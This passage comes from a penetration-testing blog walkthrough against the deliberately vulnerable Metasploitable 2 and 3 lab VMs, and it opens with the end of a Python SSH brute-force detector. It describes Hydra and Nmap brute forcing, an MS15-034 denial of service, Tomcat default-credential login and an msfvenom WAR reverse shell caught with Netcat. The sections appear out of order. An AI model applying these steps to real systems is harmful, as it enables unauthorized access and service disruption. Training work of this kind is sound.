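Nov 18 06:12:02 m3 sshd[1202]: Failed password for invalid user admin from 192.0.2.10 port 51002 ssh2
Nov 18 06:12:03 m3 sshd[1203]: Failed password for root from 192.0.2.10 port 51003 ssh2
Nov 18 06:12:04 m3 sshd[1204]: Failed password for root from 192.0.2.10 port 51004 ssh2
Nov 18 06:12:05 m3 sshd[1205]: Failed password for alice from 192.0.2.10 port 51005 ssh2
Nov 18 06:12:06 m3 sshd[1206]: Failed password for alice from 192.0.2.10 port 51006 ssh2
Nov 18 06:12:07 m3 sshd[1207]: Failed password for alice from 192.0.2.10 port 51007 ssh2
Nov 18 06:12:09 m3 sshd[1208]: Accepted password for alice from 192.0.2.10 port 51008 ssh2
Nov 18 06:20:15 m3 sshd[1300]: Failed password for bob from 198.51.100.7 port 40001 ssh2
Nov 18 06:20:31 m3 sshd[1301]: Accepted password for bob from 198.51.100.7 port 40002 ssh2
Nov 18 06:21:00 m3 sshd[1302]: Connection closed by 198.51.100.7 port 40003 [preauth]
""".splitlines()

if __name__ == "__main__":
    for ip, finding in detect(SAMPLE_LOG).items():
        print(ip, finding)
```

<p>The "invalid user" wording in the failed lines is worth its own alert: it shows a source guessing usernames that do not exist on the host, which is exactly the enumeration phase described above before the password guessing starts.</p>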
<p><a href="https://drive.google.com/uc?id=12sKm-anoOq656PTyasNGH4vMJg28BxOt" target="_blank"><img width="806" height="131" title="Brute forcing SSH with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with Nmap" src="https://drive.google.com/uc?id=1PUBZNBEBKbp92kALu-nMy3IoUoJC9eTA" border="0"></a></p>
<p><a href="https://drive.google.com/uc?id=1Uagsf4qH2BWdr_y_Jrvd-jqw1f7TX21q" target="_blank"><img width="806" height="131" title="Brute forcing SSH with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with Nmap" src="https://drive.google.com/uc?id=1lrgQK5ANXsSKVq9yzBMPJialf-HDtQIG" border="0"></a></p>
<p>And you can try with your own custom wordlists.</p>
<p><a href="https://drive.google.com/uc?id=1Kt3iyPieuOrJ77Yao5n92uJ_25g9q_lW" target="_blank"><img width="806" height="245" title="Brute forcing SSH with Nmap using custom wordlists" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with Nmap using custom wordlists" src="https://drive.google.com/uc?id=12v5AxnZ7EI23ZKS6Nin5THP0xHFrFqJz" border="0"></a></p>
<p><a href="https://drive.google.com/uc?id=1dVdCAqWWCPqCMSst2TFr4ZriNHbHQSxH" target="_blank"><img width="806" height="178" title="Brute forcing SSH with Nmap using custom wordlists" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with Nmap using custom wordlists" src="https://drive.google.com/uc?id=1VE6tBAtS6fi-x5WSZtenYjpTbmIErG_h" border="0"></a></p>
<h3>Enumerating SSH using Metasploit</h3>
<p>Take a close look at the OpenVAS results and you will find something else:</p>
<p><a href="https://drive.google.com/uc?id=1M50GKGw3XrYQoRZv_ntJWiCUM6YjmPEu" target="_blank"><img width="806" height="83" title="OpenVAS reporting enumeration vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS reporting enumeration vulnerability" src="https://drive.google.com/uc?id=15D2BqXVN0o8oksGGU9D_PlOXSzINjjMO" border="0"></a></p>
<p>This vulnerability allows you to validate which usernames exist on the SSH service.</p>
<p><a href="https://drive.google.com/uc?id=1MyUETNdDUnUth3tXUWZHeX5K1LKcPxZd" target="_blank"><img width="806" height="287" title="Enumerating SSH with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SSH with Metasploit" src="https://drive.google.com/uc?id=1rFnLrgbOeq0_JovxEL1-uybvcuuOk8WH" border="0"></a></p>
<p>Obviously, it won’t create any session, but it helps you refine the user list by rejecting all the invalid usernames. Now you can try to brute force the passwords only for these users.</p>
<h2>Exploiting Port 80 – IIS</h2>
<p>A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is triggered when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who successfully exploited this vulnerability could execute arbitrary code in the context of the System account.</p>
<h3>IIS Denial of Service</h3>
<p>This vulnerability was reported by OpenVAS as being of extreme severity.
It is identified by the number of the Microsoft Security Bulletin that describes it (<strong><em>MS15-034</em></strong>) and by its CVE identifier (<b><em>CVE-2015-1635</em></b>).</p>
<p>Search for it on your Kali system:</p>
<p><a href="https://drive.google.com/uc?id=1XJQYbLBM1e8qFvHcegDa1h36mDo1dM2w" target="_blank"><img width="806" height="139" title="Using searchsploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using searchsploit" src="https://drive.google.com/uc?id=1PZ5JNK9v1Yx-erQqV0qYAvaNkwgk8Uyo" border="0"></a></p>
<p><a href="https://drive.google.com/uc?id=1lCcEejHUMRtpEn6PnElJbl2iB5MpAxtN" target="_blank"><img width="806" height="125" title="Searching in Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Searching in Metasploit" src="https://drive.google.com/uc?id=10biIQzk16Eb7mouDzlGzHs6y-S-_J4eQ" border="0"></a></p>
<p>Start with Metasploit’s scanner module:</p>
<p><a href="https://drive.google.com/uc?id=12glBClkJ6M_zBPXOGFqdlXOYvFaRjJPY" target="_blank"><img width="692" height="759" title="Dumping the target's memory with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping the target's memory with Metasploit" src="https://drive.google.com/uc?id=1T-C53b7kFENsh85mCOjN-gb7wsFY41wh" border="0"></a></p>
<p>The module works, but it doesn’t return anything really interesting.
However, it is a good example of how a target’s memory can be dumped and saved into the database.</p>
<p>Now, try to cause a DoS with the other module:</p>
<p><a href="https://drive.google.com/uc?id=1jofjnoRnwKdx6s-2lgULGdYunF8kKxaA" target="_blank"><img width="573" height="134" title="Causing a DoS with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Causing a DoS with Metasploit" src="https://drive.google.com/uc?id=1s8KcCp6vCSLVU4jMZzkAxpxwnWsMTh51" border="0"></a></p>
<p>And it works: the target machine immediately crashes:</p>
<p><a href="https://drive.google.com/uc?id=1OvLLFjCDyBYl2TIhPDlBrCMdMfRrKxSn" target="_blank"><img width="584" height="483" title="The DoS exploit effect on the target" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The DoS exploit effect on the target" src="https://drive.google.com/uc?id=1meGbao1cP2wAiKzuiU-jj2N1aKnVEzOz" border="0"></a></p>
<p>There are plenty of other scanners that can be used against port 80, but in this case they are all useless because on that specific port there is nothing to exploit, only this:</p>
<p><a href="https://drive.google.com/uc?id=1nlbhUJibKpQjrW0JZPcSLQp34af1M73D" target="_blank"><img width="450" height="202" title="Metasploitable 3 port 80 banner" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 port 80 banner" src="https://drive.google.com/uc?id=1da9uwrjFQ1PvnelVFAfAvVA7J_-jMO1o" border="0"></a></p>

<p><em>Metasploitable 3 Windows Walkthrough: Part II</em> (Rui Natário, published 2020-11-04, updated 2020-11-21)</p>
<p>Just for the sake of organization, as was done for <a title="Metasploitable 2" href="https://tremblinguterus.blogspot.com/2020/11/metasploitable-2-walkthrough-part-i.html">Metasploitable 2</a>, let’s start exploring the services in ascending port order.</p>
<h2>Exploiting Port 21 – IIS FTP</h2>
<p>The Web Server (IIS) role in Windows Server provides a secure, easy-to-manage, modular and extensible platform for reliably hosting websites, services, and applications.</p>
<p>In Windows Server 2008, Internet Information Services (IIS) gained a new administration interface and configuration store, and the new FTP service is tightly integrated with this design. Microsoft rewrote the FTP service, and this updated service incorporates many new features that enable web authors to publish content better than before and offers web administrators more security and deployment options.</p>
<p>But in spite of being integrated in the Web Server, the IIS FTP service works pretty much like any other FTP server.</p>
<h3>Brute forcing IIS using Hydra</h3>
<p>Users can access the Metasploitable 3 VM by logging into the FTP server with a valid set of credentials. Therefore, it is a good idea to try some of the most commonly used combinations and attempt to brute force access to the FTP server. Kali Linux has a number of wordlists that can be used for this purpose. Let’s use Hydra to launch an attack:</p>
<p><strong><em>hydra -L [users file] -P [passwords file] [IP] [service]</em></strong></p>
<p><a href="https://drive.google.com/uc?id=1YY78mRzBQ_3QJ_k3eEsWCMGFIXAjM4HL" target="_blank"><img width="806" height="157" title="Brute forcing FTP with Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing FTP with Hydra" src="https://drive.google.com/uc?id=1Nu7C5nN1rTlesLjdt134mbcGVZbiJA2c" border="0"></a></p>
<p>This will take a very long time because the tool will try every password for each user.
And it might not return any good results unless you use carefully selected wordlists.</p>
<p>This is an example of successful results obtained with custom-built wordlists:</p>
<p><a href="https://drive.google.com/uc?id=1MafDqTSyHlQ8SbA6GjKMu3XKDgh9xIsz" target="_blank"><img width="806" height="168" title="Brute forced FTP using Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forced FTP using Hydra" src="https://drive.google.com/uc?id=1QQW7Xvz4izllbPN8YlE2UdyhnF25G1l7" border="0"></a></p>
<p>Once you have found a valid credential set, you can use it to log in to the remote FTP server:</p>
<p><a href="https://drive.google.com/uc?id=1AOnPGDgA9Zvpf7xjnThnBMy6-4MBbeFN" target="_blank"><img width="322" height="198" title="FTP login with brute forced credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="FTP login with brute forced credentials" src="https://drive.google.com/uc?id=1ApsFhTSKQ1XRdgblct724T6-Cfk7CXnS" border="0"></a></p>
<p>This can then be used to download/upload files, etc.</p>
<h3>Brute forcing IIS using Metasploit</h3>
<p>Metasploit has an auxiliary module that can also be used to brute force FTP passwords, just like Hydra did.</p>
<p><a href="https://drive.google.com/uc?id=1WxCY6NNHQdkAYs99ow0pu0rg7AV7QfSK" target="_blank"><img width="806" height="258" title="Brute forcing FTP with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing FTP with Metasploit" src="https://drive.google.com/uc?id=1VHPVyb40JgXEJ3mW88HXD6im2voMUrtw" border="0"></a></p>
<p>Using the custom wordlists previously created will produce the same results.
But using Metasploit has a major advantage over Hydra: the credentials found are automatically added to the database.</p>
<p><a href="https://drive.google.com/uc?id=1sUtTBMxAvusF6FgqIvruKPjrrqU8NEDI" target="_blank"><img width="688" height="143" title="Brute forced credentials added to MSF's database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forced credentials added to MSF's database" src="https://drive.google.com/uc?id=1kXp3yxrPzYaNizeHIiWmECqjyx154OoO" border="0"></a></p>
<h3>Brute forcing IIS using Nmap</h3>
<p>Using the wordlists provided with Kali and the proper Nmap script (<b><em>ftp-brute</em></b>), you will get positive results.</p>
<p><a href="https://drive.google.com/uc?id=1NJQW6PVPT9-egNbHGpHiaxt9kr7vWFzp" target="_blank"><img width="806" height="215" title="Brute forcing FTP with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing FTP with Nmap" src="https://drive.google.com/uc?id=18wfAbNHdSu5Tpii57xGHLWdwhbL4Fj42" border="0"></a></p>
<h3>IIS Directory Traversal</h3>
<p>The FTP server gives you access to the site directory and files of the IIS website served on port 80.</p>
<p>Even if you try, you cannot escape that directory.</p>
<p><a href="https://drive.google.com/uc?id=19LqdupBbYZaJPpe5de87pZkaKWLwCOGN" target="_blank"><img width="557" height="643" title="FTP directory lock" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="FTP directory lock" src="https://drive.google.com/uc?id=11Oage1sCipzHgN9gV6ds6Ouz2jeK6SZI" border="0"></a></p>
<p>You can try a traversal attack to escape the directory location. This can be done manually or via a tool such as <b><em>dotdotpwn</em></b>, as shown below.</p>
<p>It will take a significant amount of time to test all the generated directories, and it will probably fail.
But it is worth trying in order to understand how this kind of attack works.</p>
<p><a href="https://drive.google.com/uc?id=1zbMWjW5MHXOcrMG9SWbO6g5wyMpc4jzc" target="_blank"><img width="551" height="604" title="Directory traversal attempt" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Directory traversal attempt" src="https://drive.google.com/uc?id=1n0dcwEww0KBMIvXM5pu7msXr8fgNb0He" border="0"></a></p>
<p><a href="https://drive.google.com/uc?id=1R0hq8Cvg5B3iMz4De9EUpdtqVjr5VLyT" target="_blank"><img width="547" height="206" title="Directory traversal failed" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Directory traversal failed" src="https://drive.google.com/uc?id=1hVPr-wCtThyh0yHxQNwXVkXnztsmz2eH" border="0"></a></p>
<h3>IIS FTP Denial of Service</h3>
<p>If you look closely at the OpenVAS scan results, you will see this:</p>
<p><a href="https://drive.google.com/uc?id=1OYJdUjB2hogUfln9cIhY5wWioe4YOy8F" target="_blank"><img width="785" height="42" title="OpenVAS reporting DoS vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS reporting DoS vulnerability" src="https://drive.google.com/uc?id=1DHoDVJYM5s-5O-JHzwh8_YBDqsI12A-j" border="0"></a></p>
<p>Searching for the CVE online will give you access to an exploit:</p>
<p><a href="https://drive.google.com/uc?id=1QO_nnFfM8F5-00mRY1p5J6iZten5phla" target="_blank"><img width="806" height="150" title="DoS exploit in ExploitDB" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="DoS exploit in ExploitDB" src="https://drive.google.com/uc?id=1btWt1SW8h--wKl-1Xx9CMcVjzupyRN7O" border="0"></a></p>
<p>And that same exploit is available on your Kali machine:</p>
<p><a href="https://drive.google.com/uc?id=1RibfoZJEIrEBp_ao3HpEbbBDZcYkWkyT" target="_blank"><img width="806" height="238" title="DoS exploit failed" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="DoS exploit failed" src="https://drive.google.com/uc?id=1fqXMgq-_Dy7e2WMNQ8VRPS2qCRlgsGBk" border="0"></a></p>
<p>The reason for the failure is certainly the exploit's old Python code. It would be a waste of time trying to update it; the exploit would only cause the remote machine to crash. Not very useful…</p>

<p><em>Metasploitable 3 Windows Walkthrough: Part I</em> (Rui Natário, published 2020-11-04, updated 2020-11-21)</p>
<h2>Overview</h2>
<p>Metasploitable3 is a Windows Server 2008 VM that is built from the ground up with a large number of security vulnerabilities. It is intended to be used as a target for testing exploits with Metasploit. Not every type of vulnerability on Metasploitable3 can be exploited with a single module from Metasploit, but some can. Also, by default, the image is configured to make use of some mitigations from Windows, such as different permission settings and a firewall.</p>
<h2>Network Setup</h2>
<p>To conduct these exercises, you need two machines. One computer is used for attacking; the second computer is used as the victim. Using virtual machines is always the best solution for training purposes, so in the following examples a Kali Linux VM and a Metasploitable 3 VM are connected to a VirtualBox internal network with a router between the two VMs.</p>
<p>To change the settings of the Metasploitable 3 VM, just follow the normal procedure to configure network interfaces in Windows. Besides, the VM has the normal Windows firewall installed and configured with a set of rules.
For the following examples, the firewall will be turned off, but feel free to turn it back on or tweak the rules.</p>
<p><a href="https://drive.google.com/uc?id=1w0lIKNpQ6HzUujQT2dC5DRRz4n_2LUc7" target="_blank"><img width="806" height="499" title="Metasploitable 3 firewall settings" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 firewall settings" src="https://drive.google.com/uc?id=1kR2YDsVV_0QoTtyVnHungVyu7fp4E-BA" border="0"></a></p>
<p>Having the firewall turned off from the start will allow you to get complete scan results.</p>
<p>But if you decide to attack this VM with the firewall on, turning it off could be one of the first tasks. Or you can get a shell and then create an SSH tunnel that will allow you to bypass the firewall.</p>
<h2>Scanning and Enumeration</h2>
<p>The first step is to gather as much information as you can about the remote system. Use Nmap, Legion and OpenVAS to identify the open ports, running services and vulnerabilities on the target.</p>
<h3>Nmap scan</h3>
<p>Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection. You can run Nmap directly from the CLI, but it might be a good idea to run Nmap from within Metasploit so that the results are added to the MSF database for further analysis and later use.</p>
<p>There are many scanning possibilities, but the following choices of options will balance speed with accuracy.
As you add more options, you might sacrifice speed in order to get better results:</p>
<ul>
<li><b>nmap -sS [IP Address]</b></li>
<li><b>nmap -sV [IP Address]</b></li>
<li><b>nmap -T4 -sV --version-all --osscan-guess -A [IP Address]</b></li>
</ul>
<p>Typical results:</p>
<p><a href="https://drive.google.com/uc?id=1De45FvHd6GDB0N6MvOU5uvetXeidq32M" target="_blank"><img width="811" height="540" title="Metasploitable 3 Nmap initial scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Nmap initial scan results" src="https://drive.google.com/uc?id=1vFgl_i6--7QEt_wU0AuRJdJg7808-QD1" border="0"></a></p>
<p>However, the previous options won’t show you all the open ports, because the <b><em>-sV</em></b> scan mode for service and version detection uses the <b><em>nmap-services</em></b> database of about 2,200 well-known services.</p>
<p>Therefore, it might be a good idea to run some scans covering wider ranges of ports:</p>
<ul>
<li><b>nmap -sV --osscan-guess -p 1-10000 [IP Address]</b></li>
<li><b>nmap -T4 -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]</b></li>
<li><b>nmap -T4 -PA -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]</b></li>
<li><b>nmap -T4 -PA -sC -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]</b></li>
<li><b>nmap -T4 -PA -sC -sV --version-all --osscan-guess -A -p 1-65535 [IP Address]</b></li>
</ul>
<p>and even UDP ports:</p>
<ul>
<li><b>nmap -sU -sV --version-all -p 1-10000 [IP Address]</b></li>
</ul>
<p>And these are the results:</p>
<p><a href="https://drive.google.com/uc?id=1sVljGlyP2R1uEKLZlGap3cHZjtne3Uk9" target="_blank"><img width="815" height="785" title="Metasploitable 3 Nmap final scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Nmap final scan results" src="https://drive.google.com/uc?id=1MSLssv10yhp4tkXNYko2nGeJPLRVLLTW" border="0"></a></p>
<p>As you can see, there are many open ports and running services on the target VM.</p>
<p>However, the host is added to the database with wrong information:</p>
<p><a href="https://drive.google.com/uc?id=1UE7o1d38R64us85JIWUCQCihEbrWzqqK" target="_blank"><img width="618" height="141" title="OS identification in the MSF database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OS identification in the MSF database" src="https://drive.google.com/uc?id=1fhOxMbRfDyXVPZkpO-t5SBTch0ccXY_A" border="0"></a></p>
<p>But Nmap identifies it correctly:</p>
<p><a href="https://drive.google.com/uc?id=1hiR2SC8IhvF4Hepy23YS7Dc3Qbpkgu_O" target="_blank"><img width="774" height="58" title="Nmap OS identification results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Nmap OS identification results" src="https://drive.google.com/uc?id=1yVOmqH-FNTRkczzY3YAgr9IEbXpgmjed" border="0"></a></p>
<p>If you want to have things nice and clean from the start, just use Metasploit to fix it:</p>
<p><a href="https://drive.google.com/uc?id=1GzJtOtClCdSoFJlCy0yGcIAwxmr-3IBR" target="_blank"><img width="777" height="402" title="Using auxiliary module to identify the OS" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using auxiliary module to identify the OS" src="https://drive.google.com/uc?id=11a8Ca-dr2Ptq4GfJ_nnL92te0Nf0VOsG" border="0"></a></p>
<p>Now you have the correct info about your target added to the database.</p>
<h3>Legion scan</h3>
<p>Another easy way to get initial information on the target is to use Legion.
This tool runs a number of Nmap scans and also loads a number of other tools and uses them to get information about the target machine.</p>
<p>Some of the tools will immediately try to test the services found and even brute force the logins.</p>
<p><a href="https://drive.google.com/uc?id=1iot2VPv8biadDAmFZ9D6iY1etDyE3qtW" target="_blank"><img width="779" height="566" title="Metasploitable 3 Legion scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Legion scan results" src="https://drive.google.com/uc?id=1h9p-BCEH-HJCKJYUUhOXpwFOTeGjVi1u" border="0"></a></p>
<p>You can save the result of this scan for later use or for quick reference. But for proper vulnerability scanning, you will need a better tool.</p>
<h3>OpenVAS scan</h3>
<p>For a comprehensive scan, try the Open Vulnerability Assessment Scanner. This tool has a full range of capabilities, including unauthenticated testing, authenticated testing, various high-level and low-level Internet and industrial protocols, performance tuning for large-scale scans and a powerful internal programming language to implement any type of vulnerability test.</p>
<p>It can be installed on Kali Linux and updated daily with the latest vulnerability tests.</p>
<p><a href="https://drive.google.com/uc?id=1tzuhM2ozPcd9YmM7fMl3NDDIg6sVM4Tc" target="_blank"><img width="781" height="527" title="Metasploitable 3 OpenVAS scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 OpenVAS scan results" src="https://drive.google.com/uc?id=1ripZeOG6yMzQJuWflzn25Fzokvx2cSl8" border="0"></a></p>
<p>You are now ready to start exploiting the services available in Metasploitable 3 Windows 2008 Server!</p>
<p><strong>Previous post</strong>: <a title="Metasploitable 2 Walkthrough: Part X" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-2-walkthrough-part-x.html">Metasploitable 2 Walkthrough: Part X</a></p>

<p><em>Metasploitable 2 Walkthrough: Part X</em> (Rui Natário, published 2020-11-04, updated 2020-11-21)</p>
<h2>Exploiting Port 8180 – Apache Tomcat</h2>
<p>Apache Tomcat provides software to run Java applets in the browser. Coyote is a stand-alone web server that provides servlets to Tomcat applets. That is, it functions like the Apache web server, but for Java Server Pages (JSP). All this means is that web pages accessed through port 8180 will be assembled by a Java web application.</p>
<p>The Nmap scan didn't return the version, so that's probably the first thing we'll want to figure out.</p>
<p>There are many Metasploit modules available for Tomcat, so you should focus on your goals:</p>
<ul>
<li>Survey the website
<ul>
<li>Exploit possible vulnerable pages</li>
</ul>
</li>
<li>Obtain credentials</li>
<li>Deploy payload</li>
</ul>
<h3>Surveying Apache Tomcat using Metasploit</h3>
<p>Load the proper Metasploit auxiliary module and run it:</p>
<p><a href="https://drive.google.com/uc?id=15AdUd6p3mA-Amq3mSGaEHHwK1LUafCmQ" target="_blank"><img width="750" height="350" title="Surveying the Apache Tomcat service" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Surveying the Apache Tomcat service" src="https://drive.google.com/uc?id=1QbHj9v251Z4MbzVZ0F4ZdZTaXZq5hHXf" border="0"></a></p>
<p>This turns up some interesting pages that can potentially be bypassed:</p>
<p><a href="https://drive.google.com/uc?id=1v29nk4qCN_k8TokAw8ILXVLks-yn4lxi" target="_blank"><img width="482" height="382" title="Tomcat admin login page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Tomcat admin login page" src="https://drive.google.com/uc?id=1Mg1Q6tcTr_HDkjGGAsDGzQFCAsHPw0in" border="0"></a></p>
<p><a href="https://drive.google.com/uc?id=1SLQuWWmz3trFv2nF8D4KTJBC2APmcNJl" target="_blank"><img width="624" height="286" title="Tomcat WebDAV" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Tomcat WebDAV" src="https://drive.google.com/uc?id=1WSYLKuG_go0doY635tGzT3vkAgvGbv1i" border="0"></a></p>
<p>This initial recon sets the criteria for choosing the next Metasploit modules. First, you have a login page, which provides a way to brute-force login credentials. Second, you have a WebDAV interface, a potential avenue for uploading a PHP shell.</p>
<h3>Getting Apache Tomcat credentials using Metasploit</h3>
<p>Using the proper Metasploit module will produce immediate results:</p>
<p><a href="https://drive.google.com/uc?id=1hjzGURHUODDZPYsZLUE4Wb-iC_bnkzab" target="_blank"><img width="824" height="114" title="Getting Tomcat credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting Tomcat credentials" src="https://drive.google.com/uc?id=13vlDrFU2QQO1lFk9jUrkvKrTBtz2CM0U" border="0"></a></p>
<p>That was easy: the module apparently found a set of valid credentials (tomcat/tomcat).</p>
<p>Let’s try to confirm these credentials:</p>
<p><a href="https://drive.google.com/uc?id=1WQkTUyRMYlgyoE0ejNirSY9SQDlkrPwQ" target="_blank"><img width="823" height="314" title="image" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="image" src="https://drive.google.com/uc?id=1wU8jgkty1blTPnldelXgvZSEM90nIfUx" border="0"></a></p>
<p>Pay attention to the default settings.
Change them if you want, or try them as they are:</p>
<p><a href="https://drive.google.com/uc?id=1kkPGgf7jHciaQPEHLjkC9_jF-GM_utp9" target="_blank"><img width="606" height="195" title="Testing the Tomcat credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Testing the Tomcat credentials" src="https://drive.google.com/uc?id=1pxvjh7JBm-xn97EACV6UieglSjtpHBGm" border="0"></a></p>
<h3>Deploying a payload to Apache Tomcat using Metasploit</h3>
<p>Just as obtaining a remote shell on the Apache web server required uploading and executing a PHP script, obtaining a remote shell on this web server requires uploading and executing a file, but for Tomcat the executable must be a JSP (Java Server Pages) application.</p>
<p>This is solved by the <strong><em>tomcat_mgr_deploy</em></strong> module:</p>
<p><a href="https://drive.google.com/uc?id=1A-ah5tSq5nZNy0qgGkaV35Dw8AfHKy76" target="_blank"><img width="832" height="628" title="Exploiting Tomcat with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Tomcat with MSF" src="https://drive.google.com/uc?id=1w7wgqyBRbCnavdMXR0sS96viFjxLqguz" border="0"></a></p>
<p>Pay attention to the selection of targets and payloads. With the default <strong><em>java/meterpreter/reverse_tcp</em></strong> payload, you probably won’t succeed in getting a session.
Try different combinations until you do.</p>
<p>There is also the <strong><em>tomcat_mgr_upload</em></strong> module, which is very similar but also requires changing the default payload.</p>
<p>Try it as well.</p>
<p><a href="https://drive.google.com/uc?id=1wazC8sPT8u9eMNmxDHiijJdrPTsMfbvE" target="_blank"><img width="832" height="397" title="Exploiting Tomcat with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Tomcat with MSF" src="https://drive.google.com/uc?id=1aIjO9CwjPBVLtROEvqS50Ef7-gsiQO7R" border="0"></a></p>
<p>In both cases, you get a low privilege shell.</p>
<h3>Deploying a payload to Apache Tomcat manually</h3>
<p>If, for some reason, the Metasploit automated payload deployment fails, you can still exploit this server manually.</p>
<p>The management web interface gives us a place to upload <b><em>WAR</em></b> files, and a way to execute them manually.</p>
<p><b><em>.war</em></b> files are Web ARchive files that contain all the files needed for a Java-based web application. These are the files used by the Metasploit modules.</p>
<p>Using <b>msfvenom</b>, you can create shellcode and then specify what type of file to embed it in. It just so happens that one of the file types msfvenom supports is .war.</p>
<p>Use msfvenom to craft a WAR file with the payload, then manually upload and execute it.</p>
<ul>
<li>Kali IP: 172.16.1.6</li>
<li>Kali port: 5555</li>
</ul>
<p><a href="https://drive.google.com/uc?id=1objehRtLcLuI4ugFcAXzgdEvMNbRrLRl" target="_blank"><img width="827" height="142" title="Creating the Web Archive payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating the Web Archive payload" src="https://drive.google.com/uc?id=1BCGYHmw17Rn2JJyBKkTUBP8IzK43sq3A" border="0"></a></p>
<p>Access the manager at <b><em>[Target IP]:8180/manager/html</em></b>. You will be asked for credentials, but that is not a problem; just enter tomcat/tomcat.</p>
<p>Select the previously created file and deploy it.</p>
<p><a href="https://drive.google.com/uc?id=1rYk8opyDHCVc5oXObkDrp3Qv_zS2k5jP" target="_blank"><img width="827" height="592" title="Uploading the payload to Tomcat" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload to Tomcat" src="https://drive.google.com/uc?id=1Lku6HqSWKKqbBI3exr1A3NbD5zJKzeJR" border="0"></a></p>
<p>Note that this does NOT execute the payload yet!</p>
<p>To execute the payload and run the actual .war file, you will need to visit the page <b><em>http://[Target IP]:8180/runme/</em></b>. However, this will try to connect back to our command-and-control server on port 5555, so you need to be listening for the incoming connection.</p>
<p>Use Netcat to receive the incoming shell once the WAR file is executed.</p>
<p><a href="https://drive.google.com/uc?id=1St5IhznFmeCArUQVCnUzrn9qD_YJWXKJ" target="_blank"><img width="389" height="135" title="Starting the Netcat listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting the Netcat listener" src="https://drive.google.com/uc?id=1MRz79Z7skoYciunnz7EdEhvc5wT_NKXG" border="0"></a></p>
<p>Now Netcat is listening for the incoming connection, so you're ready to execute your payload.</p>
<p>Run the applet/exploit in your browser:</p>
<p><a href="https://drive.google.com/uc?id=1FAAabLn66UE_HsUYgNIy0NpA5V1J2LHP" target="_blank"><img width="527" height="127" title="Running the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the payload" src="https://drive.google.com/uc?id=16okmAO3bLf_lciONBcdDCm8uTj_Dgetg" border="0"></a></p>
<p>And you will have a shell:</p>
<p><a href="https://drive.google.com/uc?id=1ZvsapjUoun7OaU3fxBGBXm5-jD8FCTCx" target="_blank"><img width="521" height="143" title="Netcat shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Netcat shell" src="https://drive.google.com/uc?id=1JK3x6gdigvSBjxr-LpfK7UTcvLlQ31Co" border="0"></a></p>
<p><b>NOTE</b>: You can also set up a listener using Metasploit’s multi handler module.</p>
<p><a href="https://drive.google.com/uc?id=1B62m5lLONwP90Hgy1myeNjFRSMdgBV4Z" target="_blank"><img width="835" height="245" title="Metasploit command shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploit command shell" src="https://drive.google.com/uc?id=1qQtnt6JViK6fyr9JOQCQtNH-47FmRWCe" border="0"></a></p>
<p>The advantage of using Metasploit is the possibility of upgrading the session from a command shell to Meterpreter.</p>
<p><a href="https://drive.google.com/uc?id=1ckIzpZkA1EV8hzPVvGFG8QHtoYK5K27H" target="_blank"><img width="836" height="277" title="Upgrading the command shell to meterpreter shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Upgrading the command shell to meterpreter shell" src="https://drive.google.com/uc?id=1WPjuOz2pHqL20ozQBxjXJ0M3qIirb1_V" border="0"></a></p>
<h4>Cleaning up</h4>
